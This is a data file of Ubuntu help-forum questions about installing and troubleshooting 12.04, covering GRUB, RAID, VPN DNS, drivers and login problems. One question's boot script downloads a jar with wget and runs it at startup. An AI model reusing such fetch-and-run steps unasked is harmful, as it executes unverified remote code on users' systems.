135663	unity shows through games	some native games work fine , but some do n't . mostly it happens with wine games . i play a lot of adventure games and i try to play ags games a good amount because there are a lot of them and they work great under wine . when i play games the unity icon bar and universal toolbar show through . sometimes on native games but always on wine games . is there anyone else this happens to and is there a way to fix this ? [ edit ] for some reason the site wo n't let me comment ? ? ? yes sorry , it 's when i try to fullscreen the game .
135665	how do i get a brother dcp8070d printer working ?	i installed ubuntu 12.04 . i downloaded and installed the drivers from the brother solutions , but the printer does not receive data for printing . the model of the brother laser printer is dcp8070d . anyone know a solution to this ?
135666	can not get passed the login screen	i have the same issue as others ( see login returns to login screen [ closed ] ) . when i arrived at the login screen , i enter my password , the screen goes black for one second , displaying some text , and then it returns me to a fresh login screen . i can go to a console alt+f1 and login into my account on the command line . it is a fairly fresh install of ubuntu 12.04 64 bit , plenty of room left on the home dir . permissions on the home directory are okay 755 . only one user . any hint because i can not fix this apparently ... thanks ! oh yes : the xsession-errors log says : `` mkdtemp : private socket dir : permission denied '' . reinstalled unity , to no avail .
135672	migrating users from fedora , anything to look out for ?	i 've migrated around 300 users from a fedora server to ubuntu . i copied over all the relevant entries in /etc/passwd , /etc/shadow , /etc/group , and /etc/gshadow . one thing that was a bit concerning is that ubuntu starts the uid 's at 1000 while fedora at 500 . i saw that i can adjust that starting number , but will that really cause any issues if i just leave it ? none of the users i copied over had conflicting uid 's or gid 's with what was already on the ubuntu server . i 'm wondering if there is anything else i should look out for here . maybe something that useradd does that i have n't taken into account ?
135674	how to debug unity ? ( it works from live cd , but it does n't work after update ... )	i 've tested ubuntu 12.04 from live usb before executing the automagic update ( from 11.10 to 12.04 ) and everything was fine . then , after updating , i could n't even get unity 2d to work . i 've installed gnome packages , so i can use gnome classic ( only the `` with no effects '' option works ) . does any one know how to debug ubuntu/unity to try to get it working ? ( or i 'll need to do a fresh install ... )
135676	how can i remove or disable `` unlock from launcher '' in the quicklist of a launcher-icon ?	i 'm maintaining the pc of an old relative . the person shall not have the possibility to unlock a launcher-icon by means of `` unlock from launcher '' in the quicklist ( in former ubuntu versions it was named uncheck `` keep in launcher '' ) . is it possible to remove or disable ( greyed out ) `` unlock from launcher '' in the quicklist of a launcher-icon ?
135682	avconv x11grab issues : unable to find a suitable output format for 'pulse '	i am running ubuntu 12.04 lts 64-bit , and i am attempting to use avconv to record the primary display connected to my computer ( resolution of 1920x1080 ) using x11grab at 30 frames per second , along with audio from the default audio device connected to my computer through pulse . however , when i run the command : avconv -f x11grab -s hd1080 -r 30 -i :0.0 pulse -i default recording.ogv the terminal prints out the error : unable to find a suitable output format for 'pulse ' . what is causing this error message to be displayed ?
135684	rc.local runs .sh file in wrong directory	in rc.local i added a line for my shell file i want to run on boot : /direc/tory/ < filename > .sh the script looks like this : # ! bin/sh wget `` http : //somesite.org/somejava.jar '' -o /direc/tory/somejavafile.jar java -d64 -xincgc -xmx512m -jar /direc/tory/somejavafile.jar and i would assume it would run and load in the /direc/tory/ folder but it keeps running in / and it saves all its files in there as well . what do i have to do to force it to run in the /direc/tory/ folder ?
135685	alt-tab does not switch	since upgrading to 12.04 , my alt-tab occasionally does not work . i can not determine the symptoms that lead to it , but there are some windows that just decide not to show . what happens is i alt-tab to a given window , say the terminal , and instead of showing it , i just see it wobble like a notification in the list of programs down the left . is this a bug ?
135688	xorg crashes randomly when playing flash video	i 'm using ubuntu 12.04 x64 , nvidia graphics with the `` current '' driver . same happened with the `` current-updates '' driver . every now and then , while watching flash playback ( not every time ) ubuntu crashes to login screen . dmesg : xorg [ 8478 ] general protection ip:7f5f27e466a9 sp:7fffdda31ff0 error:0 in nvidia_drv.so [ 7f5f27de5000+6e0000 ] /var/syslog : may 11 22:55:47 kernel : [ 22859.617181 ] xorg [ 8478 ] general protection ip:7f5f27e466a9 sp:7fffdda31ff0 error:0 in nvidia_drv.so [ 7f5f27de5000+6e0000 ] may 11 22:55:47 gnome-session [ 8647 ] : gdk-warning : gnome-session : fatal io error 11 ( zasoby chwilowo niedostępne ) on x server :1. # 012 may 11 22:55:48 acpid : client 8478 [ 0:0 ] has disconnected may 11 22:55:48 acpid : client 8478 [ 0:0 ] has disconnected may 11 22:55:48 acpid : client connected from 12626 [ 0:0 ] may 11 22:55:48 acpid : 1 client rule loaded may 11 22:55:49 acpid : client connected from 12626 [ 0:0 ] may 11 22:55:49 acpid : 1 client rule loaded the `` zasoby chwilowo niedostępne '' line means `` resources temporarily unavailable '' . i 'm using firefox 12.0 .
135694	i ca n't start ubuntu 12.04	my system is : cpu intel 8400e , video card ati hd6850 , motherboard gigabyte p31 , 2x2gb ddr2 corsair , hd wd 250 gb ( order of partitions no1 `` \boot '' 700 mb , ext3 ; no2 `` \ '' 32 gb ext3 ; no3 `` swap '' 2gb , rest ntfs ) . during installation all went fine ( no display errors , desktop resolution was correct identify & set 1680*1050 , i manage to set up internet connection & installed the updates ) . then i restart pc as bbuntu demanded . soon after the problems occurred . 1. the screen was split in 2 vertically . i see the login screen , entered the psw and = > next problem all i see was the ubuntu desktop colour but no icon or toolbar or something to choose , just an empty desktop split in two 3 all this time , from login till i restart pc the screen was flickering very very fast ( after 10 secs of watching my eyes start to hurt ) i mention no error message appears neither something to tell me what to do . i really hope you can help me with some explanation/advice , i do n't understand why is this happening . thanks so much for your understanding !
135697	how to build a firefox .deb without webm support ?	i want to alter the firefox package to remove webm and other features . i prefer not just to compile sources - i need to understand what in a deb package i need to alter . i do n't want to have a pile of sources which are manually configured , compiled and installed via non package manager route ; and was looking for a way to set package config flags on ubuntu how do i alter the firefox 's deb package to do the above ?
135700	multiple module loads from /etc/modules without device disconnect	i am flashing a device which enumerates with different product ids during the flash process . when connected usbserial is correctly added based on my entry in /etc/modules . once i flash the device , the device automatically re-enumerates but does n't add usbserial again for the newly reported productid . i am assuming it is because i did n't physically disconnect the usb device . if i do disconnect the device the initial image i flashed is lost and a i 'm back a step one . is there any way to get this to work without writing a custom kernel module ?
135705	`` no root file system is defined '' error during installation	i tried installing ubuntu 12.04 lts 32 bit , but when i get to this and hit forward i get taken to a prompt where it says `` no root file system is defined . '' i do n't even get to any part about partitioning , and there is nothing for me to choose or select from . other similar posts at least get to a part where where they can choose how they want to allocate drive space . i have followed the instructions for partitioning here : http : //members.iinet.net.au/~herman546/p22.html exactly and my partition looks exaclty like but i have more space . everything is the same as this image ( including partition names , file system names , and flags ) , except my sizes are bigger . after this failed i deleted the new partitions , so i was left with dev/sda1 and dev/sda2 , and tried to install again but i got the same error . every time i try out ubuntu it 's something new that seems to not work , and its super frustrating . any help would be more than appreciated .
135707	virtual interface shows up in ifconfig but no connections can be be made to it . what is wrong ?	i have a vps set up with ubuntu 12.04 on it and am having trouble getting a second ip set up as a virtual interface . i 've configured the interface as you can see from my /etc/networking/interfaces file here : # the loopback network interface auto lo iface lo inet loopback # interfaces brought up durring boot auto eth0 eth0:0 eth0:1 # eth0 - public ip , wan access iface eth0 inet static address 72.14.191.251 netmask 255.255.255.0 gateway 72.14.191.1 # eth0:0 - public ip , wan access iface eth0:0 inet static address 173.255.199.148 netmask 255.255.255.0 gateway 173.255.199.1 # eth0:1 - private ip , lan access iface eth0:1 inet static address 192.168.128.46 netmask 255.255.128.0 the interface in question is eth0:0 with the ip of 173.255.199.148 , no connection can be made to that ip . i ca n't even ping it . if i run ifconfig , all interfaces show as up : eth0 link encap : ethernet hwaddr f2:3c:91 : ae : a0:8b inet addr:72.14.191.251 bcast:72.14.191.255 mask:255.255.255.0 inet6 addr : 2600:3c00 : :f03c:91ff : feae : a08b/64 scope : global inet6 addr : fe80 : :f03c:91ff : feae : a08b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3664 errors:0 dropped:0 overruns:0 frame:0 tx packets:2908 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:330670 ( 330.6 kb ) tx bytes:970665 ( 970.6 kb ) interrupt:44 eth0:0 link encap : ethernet hwaddr f2:3c:91 : ae : a0:8b inet addr:173.255.199.148 bcast:173.255.199.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 interrupt:44 eth0:1 link encap : ethernet hwaddr f2:3c:91 : ae : a0:8b inet addr:192.168.128.46 bcast:192.168.255.255 mask:255.255.128.0 up broadcast running multicast mtu:1500 metric:1 interrupt:44 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:135 errors:0 dropped:0 overruns:0 frame:0 tx packets:135 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:141948 ( 141.9 kb ) tx bytes:141948 ( 141.9 kb ) trying to bring the interface down or up does n't help either : chris @ optimus : ~ $ sudo ifdown eth0:0 ifdown : interface eth0:0 not configured chris @ optimus : ~ $ sudo ifup eth0:0 rtnetlink answers : file exists failed to bring up eth0:0 . nor does restarting networking : chris @ optimus : ~ $ sudo /etc/init.d/networking restart * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... resolvconf : error : /etc/resolv.conf is n't a symlink , not doing anything . resolvconf : error : /etc/resolv.conf is n't a symlink , not doing anything . resolvconf : error : /etc/resolv.conf is n't a symlink , not doing anything . ssh stop/waiting ssh start/running , process 4289 rtnetlink answers : file exists failed to bring up eth0:0. resolvconf : error : /etc/resolv.conf is n't a symlink , not doing anything . ssh stop/waiting ssh start/running , process 4361 even a complete system reboot did nothing . what is the problem here ? what am i missing ?
135714	keep getting an annoying aw snap ! on ubuntu 12.04 google chrome why is this happening can it be fixed please ?	keep getting an annoying aw snap ! on ubuntu 12.04 google chrome why is this happening can it be fixed please ? has any body else cured this its a nuiscance , chrome is very good but i may have to go back to firefox once more .
135715	how to fix unity greeter login/splash screen ?	i 've upgraded ubuntu 11.10 to 12.04 and after upgrade i see a broken lightdm login screen ( strange dots around the screen ) . when changing login name , the screen 's back to normal . how to fix that issue ? after upgrade to 12.10 login screen back to normal . thanks anyway : )
135717	still no success to install skype on ubuntu 12.04 from software centre , nor from terminal	two questions have been posted reporting difficulties to install skype on ubuntu 12.04 advice given for how to do this from terminal and by using software centre . i followed the advice but it did not work . skype appears in software centre , but this is no install button visible . if you press the more info button if returns an error that the software can not be found ! any advice how get forward would be appreciated . -colum
135719	prevent users from encrypting their home folders	how can i prevent users from encrypting their home folder on a server inside our company without removing the respective packages ? are there any policies i can enable to prevent this ? edit : the reason is that employees leaving should not leave data behind in encrypted form on this machine . they have the opportunity to use encryption on their personal workstation to some extent . those users do not have super user powers .
135721	do i have to worry about `` error : superfluous raid member '' ?	when running update-grub on the newly installed ubuntu 12.04 with an older software raid ( md ) , i get : error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . generating grub.cfg ... error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . found linux image : /boot/vmlinuz-3.2.0-24-generic found initrd image : /boot/initrd.img-3.2.0-24-generic error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . found linux image : /boot/vmlinuz-3.2.0-23-generic found initrd image : /boot/initrd.img-3.2.0-23-generic error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . found memtest86+ image : /boot/memtest86+.bin error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . error : superfluous raid member ( 5 found ) . found debian gnu/linux ( 5.0.9 ) on /dev/sdb1 found debian gnu/linux ( 5.0.9 ) on /dev/sdc1 done i would be less worried if the message would say warning : ... , but since it says error : ... i 'm wondering what the problem is . # cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md2 : active raid1 sdc1 [ 1 ] sdb1 [ 0 ] 48829440 blocks [ 2/2 ] [ uu ] md3 : active raid1 sdc2 [ 1 ] sdb2 [ 0 ] 263739008 blocks [ 2/2 ] [ uu ] md1 : active raid5 sdg1 [ 3 ] sdf1 [ 2 ] sde1 [ 1 ] sdh1 [ 0 ] sdi1 [ 4 ] sdd1 [ 5 ] ( s ) 1250274304 blocks level 5 , 64k chunk , algorithm 2 [ 5/5 ] [ uuuuu ] unused devices : < none > do i have to worry or is this harmless ? btw : disregard the mentioning of debian 5.0.9 , that was the previously installed system and is going to be overwritten . it 's on /dev/md2 actually .
135722	how do i restore the original grub2 after an update on the other ubuntu install overwrites it ?	i have a dual boot ( actually triple with windows but that 's irrelevant ) with ubuntu 12.04 [ 1 ] and another ubuntu [ 2 ] . i recently upgraded [ 2 ] which may have overwritten [ 1 ] 's grub with [ 2 ] 's grub , ie [ 2 ] is top of the list and background color previously changed is back to purple . [ 1 ] being my main os , id like [ 1 ] 's grub back : ( im well aware of the windows-ubuntu mbr issue that can be fixed by reinstalling grub 2 . im just asking if there 's a simpler way when it 's about 2 ubuntus . what could i do knowing that i have access to all os ' ? ps : sudo update-grub in [ 1 ] is n't enough ...
135726	alcatel x215 3g no longer works in 12.04 ( no /dev/ttyusb* )	i just upgraded my netbook from ubuntu 11.xx to 12.04 and after that i could not use my alcatel x215 3g modem any more . with the former version of ubuntu , i had installed the driver-tool package from alcatel plus usb-modeswitch and wdial . all worked perfectly . after the upgrade no way . i could not find any trace of /dev/ttyusb* in the file system . how can i get my modem to work in 12.04 ?
135728	chromium in 10.04 only showing blank pages	i have a problem in ubuntu 10.04 ... all pages with chromium showed blank . the first time i 've noticed this problem was with google chrome , and because of that i 've uninstalled and installed chromium . after seeing some threads in google groups some of the users said that it maybe some malware . because of that runned chkrootkit and rkhunter and nothing popped up , besides of this : eth1 : packet sniffer ( /sbin/wpa_supplicant [ 1237 ] , /sbin/dhclient3 [ 3964 ] ) virbr0 : not promisc and no packet sniffer sockets it 's problematic ? ca n't tell ... could anyone help me please ? thanks in advance .
135730	ubuntu 12.04 slows down wireless network	i am using ubuntu 12.04 and my husband is using windows 7 . ever since i installed ubuntu , when my computer is on it slows down the entire network ( when we are both connected wirelessly ) . we have tested the connection with both our pcs wired in to the router and with just my computer wired in to the router . when my computer is wired in , we experience no issues with the connection . i have checked the network traffic using iftop and it reports no network activity . we have confirmed the speed differences using speedtest.net . i have temporarily remedied the situation by using qos on my router .
135731	desktop onto tv	i presently have my desktop on both my computer monitor and hdtv , windows 7 allows you to do this 3 different ways but i just duplicate the desktop to the tv . is this possible using just ubuntu ? i would also like to port the sound through my entertainment system and not just the computer speakers . can this be done with no extra cost as windows does it ?
135733	partition beginning or end ?	what is the difference of the location of the disk at the beginning or end , i would like an explanation please . ?
135734	mount /usr in ram ( loading from hdd when starting , and saving to when shutting down )	i have the current scenario : 16gb or ram . for the most part , around 10~12gb unused almost never install/remove software , this is a mature system only reboot like once a week , so ( re- ) boot time is irrelevant /usr is around 8gb hdd is slow , and no budget to change that in the near future mounting /tmp as tmpfs in fstab did wonders for performance and i just had this crazy idea : is it possible to , somehow , use my ram to `` store '' /usr ? in that that , when starting up , it reads current /usr content from hdd and copy it to a tmpfs and mount that as /usr ? if possible , also flushing the ( perhaps updated ) contents back to hdd when shutting down ? or maybe allowing me to easily `` temporarily switch back to hdd '' when eventually needed to install/remove new software or updates ? any approach is welcome , ready-to-use commands will be highly regarded . thanks !
135736	how can i restart unity after i resume from suspend ?	this may sound like a stupid idea but i like to have a transparent top-panel which can be configured in compiz config settings manager , but when i resume from a suspend it 's no longer transparent and gives a graphical glitch when invoking the dash . this goes away if i restart unity by running the command `` unity '' . so i was wondering if it was possible to achieve this ? i tried setting a script in /etc/pm/sleep.d/ as stated in how to execute a command after resume from suspend ? but it did n't work , i guess it is run before i get to log in again and unity resumes . is there any way to achieve what i want or should i just give up ?
135738	eeepc 1000h touchpad scrolling too far	after i installed v12 , the touchqad of my eeepc 1000h got an annoying habit . in a browser i scroll up/down by swiping my finger along the right side of the touchpad . if i do it slowly , stop for a moment and then remove my finger , suddenly the moment i remove the finger the screen jumps up/down -- ie it scrolls in the same direction a step too far . this is increadibly annoying particularly on a small screen , where i have to scroll back and forth several times to get where i want . this did n't happen before v12 , does n't happen with a mouse and i do n't see any relevant settings . also , the slow scrolling and pause described above are essential . otherwise , it works fine . of course the same happens in nautilus and whatever involves scrolling . any ideas ?
135739	why does groupmod < tab > < tab > show me my folders and not my groups ?	i was trying to solve virtualbox 's usb problem by adding my username to the vboxusers group , but when i tried to see if the group existed by using groupmod tab tab all i got was what appears to be my home directory . why is that ? what can i do to see the groups on my system ?
135741	how should one set the grub-pc package 's `` install_devices '' debconf setting ?	many times the value of the `` install_devices '' debconf setting in the grub-pc package is wrong for various reasons . sometimes it 's because ubuntu 's installer selected a different install device than the bios boots from , sometimes it 's because the user manually selected that grub 's boot sector should be installed to a partition ( which is wrong , it should always go in the mbr ) , etc . what is the officially supported way to change this debconf setting , preferably showing the user the helpful selection screen that used be given by sudo dpkg-reconfigure grub-pc ( but which is no longer shown by this command in ubuntu 12.04 ) ?
135746	unity home icon replaced with grey file cabinet	somehow i managed to remove the home icon from my unity bar . i ran nautilus and locked its icon onto the bar . this works like before but the problem is the icon i am getting is the grey file cabinet , rather than the home icon . i tried several things i found on the net , but nothing . btw , i do n't have a `` nautilus.desktop '' under /usr/share/applications . the closest filename i have is `` nautilus-actions configuration tool '' . not critical but any ideas ?
135747	how can i turn off `` eye candy '' and make ubuntu run as fast as possible ?	for example in windows xp ( and onwards ) , you can right click my pc - > properties - > advanced system settings and disable a whole slew of features that turn off eye candy and make the computer runs blazing fast . since i 'm running ubuntu on a virtual machine for development purposes i really do n't care if my windows have transparency or slide in and out . i just want it to run as fast as possible . is this possible in the latest version of ubuntu ?
135748	how do i get obdii software working ?	i have an odbii usb cable for vehicle diagnostics , unfortunately i have n't been able to get it working on ubuntu 12.04 . the closest i 've come is using the vag-com software with wine , using the ln -s /dev/ttyusb0 ~/.wine/dosdevices/com1 trick and running stty -f /dev/ttyusb0 speed 9600 repeatedly . it will connect and show the vehicle is obdii , but none of the useful features seem to be working . i tried : scantool - says it 's connecting to the /dev/device in terminal , but does n't . obdgpslogger - times out all the time . pyobd - this seems to be the most up-to-date source i could find , i had to adjust the code a bit to work ( see here for changes ) . still , in obd_io.py interpret_result function , it says it 's looking for 4 space separated numbers , where the usb-serial is receiving bogus code `` 0100 '' instead ? freediag - i tried compiling , sh ./configure ran fine . i had to change some executable bit to make it start to compile , but now running make gives error : diag_general.c:52 : undefined reference to diag_l0_config' diag_general.c:55 : undefined reference todiag_l2_config' collect2 : ld returned 1 exit status ... and fails . the device shows up in lsusb as : id 0403:6001 future technology devices international , ltd ft232 usb-serial ( uart ) ic is the problem that these native tools do n't expect a usb serial , or a serial of this type ? or are these apps too old to recognize obd2 of this vehicle ?
135758	how to install another ubuntu alongside different version of ubuntu ?	just as the question says , i need to install newer version of ubuntu without messing up the older version . i have looked at the responses to similar questions but it is n't clear to me how to do so ( some suggest dual boot using a second hdd and some suggest using virtualization -- both of these are not an option for me ) .
135759	pushing forward-lookup zones to vpn clients ' dnsmasq configuration	ubuntu 12.04 uses a nice little automagic dnsmasq configuration for handling name resolution across dns connections so that name resolution happens properly . when i connect to my openvpn server at work ( for which i am the administrator ) the client recognizes the reverse lookup networks properly and puts lines for those into the dnsmasq config , but not the forward networks : /var/run/nm-dns-dnsmasq.conf : server=/10.in-addr.arpa/192.168.0.5 server=/0.168.192.in-addr.arpa/192.168.0.5 server=192.168.1.3 the contents should be : server=/workdomain.ca/192.168.0.5 server=/10.in-addr.arpa/192.168.0.5 server=/0.168.192.in-addr.arpa/192.168.0.5 server=192.168.1.3 what do i need to change on my openvpn server ( pfsense ) to push one or more search domains to the vpn client ?
135768	where is a list of special url types ?	i was looking in gconf-editor , and i say under url-handlers , all sorts of things before i thought had nothing to do with urls . i knew that you could do apt : package and irc : channel , but it had things like notes and trash . i had no idea that the internet could be so integrated into an operating system ( while besides google chrome os which is both an os and a browser at the same time . ) does anyone know of a list of the various urls you can have . is there such a thing as a url that executes any command at will ! ( just imagine , no more just sending code to someone . you can send them a link to excute any command ! )
135769	how to fix the installation of new linux kernel ?	i have installed ubuntu 12.04 on my acer 5740 . internal hdd of my lappy got damaged therefore i have installed it on usb hdd . when i was upgrading to latest upgrades the new linux kernel was also upgraded.out of all updates some some app upgraded successfully but when linux kernel was setting up then an erro come as `` sda could not be read '' that is my innternal hdd . how can i remove this linux update which interrupted other updates ? abhijeet @ abhijeet-aspire-5740 : ~ $ sudo apt-get upgrade [ sudo ] password for abhijeet : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . abhijeet @ abhijeet-aspire-5740 : ~ $ sudo dpkg -- configure -a dpkg : error : dpkg status database is locked by another process abhijeet @ abhijeet-aspire-5740 : ~ $ sudo apt-get install whatever e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? abhijeet @ abhijeet-aspire-5740 : ~ $ sudo rm /var/lib/dpkg/lock abhijeet @ abhijeet-aspire-5740 : ~ $ sudo dpkg -- configure -a setting up linux-image-3.2.0-24-generic ( 3.2.0-24.37 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-24-generic /boot/vmlinuz-3.2.0-24-generic update-initramfs : generating /boot/initrd.img-3.2.0-24-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-24-generic /boot/vmlinuz-3.2.0-24-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-24-generic /boot/vmlinuz-3.2.0-24-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-24-generic /boot/vmlinuz-3.2.0-24-generic error : can not read from `/dev/sda ' . error : can not read from `/dev/sda ' . generating grub.cfg ... error : can not read from `/dev/sda ' . error : can not read from `/dev/sda ' . error : can not read from `/dev/sda ' . derror : can not read from `/dev/sda ' . error : can not read from `/dev/sda ' . error : can not read from `/dev/sda ' .
135773	installing 12.04 on a system with windows 7 and uefi	i 'm trying to install ubuntu 12.04 ( 64bits ) next to a windows 7 preinstalled system . i have found some troubles during the process . windows 7 partitions are like shown in figure [ a link ] https : //www.dropbox.com/s/45nxzwpn2cngz9e/captura.png my idea was , during the ubuntu installation , re-size the os partition , allocating there windows and the `` / '' root folder , and make the data partition my new `` /home '' folder . the problem is that when i boot ubuntu live cd ( or usb ) both in efi or mbr mode , in the partitioning step no partitions are detected in the disk . so , ubuntu does not recognize the windows 7 partitions . how can i install ubuntu , without reinstalling windows 7 ? ( is a new notebook and i do n't have all the drivers in the marker web ) . thanks a lot for your help [ update ] here are 2 screenshots from gparted and fdisk -l ( running the live usb ) [ a link ] https : //www.dropbox.com/s/d508aj61gvndt84/screenshot % 20from % 202012-05-12 % 2011 % 3a39 % 3a25.png [ a link ] https : //www.dropbox.com/s/z5p83udaqqogqc1/screenshot % 20from % 202012-05-12 % 2009 % 3a40 % 3a54.png
135778	no sound on ubuntu 12.04	after i installed ubuntu 12.04 , there are no sound at all on my headphone ( rear jack panel ) . on sound settings > playback , it seemed that the sounds were detected after i choose 'play sound ' . anybody can fix this issue ? ? thanks .
135779	gfortran not found in software center in 12.04	my friend using an older version of ubuntu has gfortran in the ubuntu software center . i think he did not need to download anything . it was already there . he just installed it . but in my case , when i tried searching for it my own ubuntu software center , i could n't find it . i just upgraded to ubuntu 12.04 lts . is it really not available to the new version of ubuntu ?
135787	gray button for saving `` editing vpn connection '' in ubuntu 12.04	i have installed 12.04 and setting up the openvpn via network manager . the network-manager-openvpn-gnome is installed , and i can open `` configure vpn ... '' and see `` add vpn '' , however i can not save my settings . the `` save.. '' button is gray and `` apply to all users '' is selected and gray too . is this a bug ?
135789	changing the administrator 's password	i installed ubuntu 12.04 in my computer along with windows x p os.i forgot the password given at the beginning.and i gave my full name as user name with a gap in between my two names.now i can not log in as an administrator . what should i do ? please help me .
135790	no sound on an imac	i have no sound on my imac , with 12.04 from a clean install from cd . i have checked alsamixer and a number of other things . still no sound .
135791	how can i set the display resolution to 800x480 ?	i have just installed ubuntu 12.04 and i have a problem with it . my mini-laptop has a display resolution of 800x480 , however ubuntu seems to support only a resolution of 800x600 . i have looked for a solution , but i have found nothing which works . so , how can i set the display resolution to 800x480 ? hey , hola a todos ! acabo de instalar ubuntu 12.04 y en verdad me gusta mucho . pero aunque me guste bastante , tengo un peque帽o gran problema , la resolucion de mi pantalla ! ! ! mi mini-laptop tiene una resoluci贸n de 800x480 , pero ubuntu viene con una por defecto de 800x600 . en verdad me gustaria que me pudieran ayudar . llevo rato buscando una solucion , pero nada ! ! ! espero que me puedan ayudar ! ! ! gracias de antemano ! ! ! saludos
135794	cinnamon not loading properly , maybe gnome instead ?	i installed cinnamon , rebooted , selected cinnamon at login but i do n't think it 's loading properly . i cant seem to get the mint menu that all the online installation guides have screenshots of . i wonder if i 'm even running cinnamon or it 's just the gnome classic interface ? here 's a screenshot of what i see : i am running an acer aspire revo - r3610 which uses a nvidia ion gpu . i 've tried both the current and current-updates drivers , and i 'm running ubuntu 12.04lts x86
135798	svn error when commit directory	i use svn to commit a folder a checked out before and i get the message `` containing working copy admin area is missing '' this is the command i used : svn commit -m svn : /home/user/workspace/data/xyz the path /home/user/workspace/data/xyz is on my local pc where xyz is the folder i checked out before .
135799	get a new password	help somebody to me please.i installed ubuntu 12.04 to run along with windows x p.i forgot my password . and now i can not log in as administrator to ubuntu.how do i change administrator 's password.please plzzzzzzzzzzzzzzz help me.thanks in advance .
135800	integrated webcam in lenovo t410 not working with 12.04	i have a lenovo t410 with an inbuilt webcam and i have n't been able to get the webcam working . i tried skype , cheese , both just give me a black window . the microphone works fine with skype , by the way . can anyone provide any clues please ? the webcam is enabled in the bios , but there is no light indicating the webcam is on ( not sure if there should be , though ) . i tried this on kubuntu 11.10 and have upgraded to 12.04 with the same results . the fn-f6 keyboard combination doens't seem to do anything either . edit : i got the webcam replaced , it looks like it was a hardware problem , because it works fine now . thanks guys . $ ls /dev/v4l/* /dev/v4l/by-id : usb-chicony_electronics_co.__ltd._integrated_camera-video-index0 /dev/v4l/by-path : pci-0000:00:1a.0-usb-0:1.6:1.0-video-index0 and lsusb : $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 147e:2016 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 004 : id 0a5c:217f broadcom corp. bluetooth controller bus 001 device 005 : id 17ef:480f lenovo integrated webcam [ r5u877 ] bus 002 device 003 : id 05c6:9204 qualcomm , inc . bus 002 device 004 : id 17ef:1003 lenovo integrated smart card reader here is the output from guvcview , minus lots of lines describing the available capture formats . it says `` unable to start with minimum setup . please reconnect your camera. '' . guvcview 1.5.3 alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started video device : /dev/video0 init . integrated camera ( location : usb-0000:00:1a.0-1.6 ) { pixelformat = 'yuyv ' , description = 'yuv 4:2:2 ( yuyv ) ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , ... . { discrete : width = 1600 , height = 1200 } time interval between frame : 1/15 , vid:17ef pid:480f driver : uvcvideo checking format : 1196444237 libv4l2 : error setting pixformat : device or resource busy vidioc_s_format - unable to set format : device or resource busy init v4l2 failed ! ! init video returned -2 trying minimum setup ... video device : /dev/video0 init . integrated camera ( location : usb-0000:00:1a.0-1.6 ) { pixelformat = 'yuyv ' , description = 'yuv 4:2:2 ( yuyv ) ' } { discrete : width = 640 , height = 480 } ... . vid:17ef pid:480f driver : uvcvideo checking format : 1448695129 libv4l2 : error setting pixformat : device or resource busy vidioc_s_format - unable to set format : device or resource busy init v4l2 failed ! ! error : minimum setup failed . exiting ... vidioc_reqbufs - failed to delete buffers : invalid argument ( errno 22 ) cleaned allocations - 100 % closing portaudio ... ok terminated .
